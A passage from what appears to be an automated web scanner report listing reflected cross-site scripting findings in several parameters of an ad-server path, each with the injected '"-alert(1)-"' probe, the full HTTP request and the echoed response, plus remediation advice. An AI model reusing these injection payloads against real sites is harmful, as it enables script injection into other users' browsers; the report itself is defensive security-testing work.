og.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com8bca5"-alert(1)-"629032b61be&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e
...[SNIP]...

1.15. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c83"-alert(1)-"afe2288af06 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2a1c83"-alert(1)-"afe2288af06&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2a1c83"-alert(1)-"afe2288af06&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p
...[SNIP]...

1.16. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abbd"-alert(1)-"5fda04e4c5c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com2abbd"-alert(1)-"5fda04e4c5c&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com2abbd"-alert(1)-"5fda04e4c5c&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med
...[SNIP]...

1.17. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bcfe"-alert(1)-"9006f31a0a5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI8bcfe"-alert(1)-"9006f31a0a5&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI8bcfe"-alert(1)-"9006f31a0a5&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;

...[SNIP]...

1.18. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25277"-alert(1)-"1ddf9b03232 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=25277"-alert(1)-"1ddf9b03232&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=25277"-alert(1)-"1ddf9b03232&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2
...[SNIP]...

1.19. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d0be"-alert(1)-"7df4c502bea was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=1007d0be"-alert(1)-"7df4c502bea&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=1007d0be"-alert(1)-"7df4c502bea&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt
...[SNIP]...

1.20. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288db"-alert(1)-"a81bde65779 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=288db"-alert(1)-"a81bde65779&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=288db"-alert(1)-"a81bde65779&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.
...[SNIP]...

1.21. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c336"-alert(1)-"521d37aa33 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83012c336"-alert(1)-"521d37aa33&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6909

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83012c336"-alert(1)-"521d37aa33&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&
...[SNIP]...

1.22. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca204"-alert(1)-"a9f792ba15b was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18ca204"-alert(1)-"a9f792ba15b&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18ca204"-alert(1)-"a9f792ba15b&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fs
...[SNIP]...

1.23. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a69"-alert(1)-"0a05ff2bab1 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33Cb1a69"-alert(1)-"0a05ff2bab1&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33Cb1a69"-alert(1)-"0a05ff2bab1&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&
...[SNIP]...

1.24. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a4d"-alert(1)-"84edf4b2caa was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619f1a4d"-alert(1)-"84edf4b2caa&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/x%3B231241976%3B0-0%3B0%3B55844876%3B4307-300/250%3B38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619f1a4d"-alert(1)-"84edf4b2caa&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdo
...[SNIP]...

1.25. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

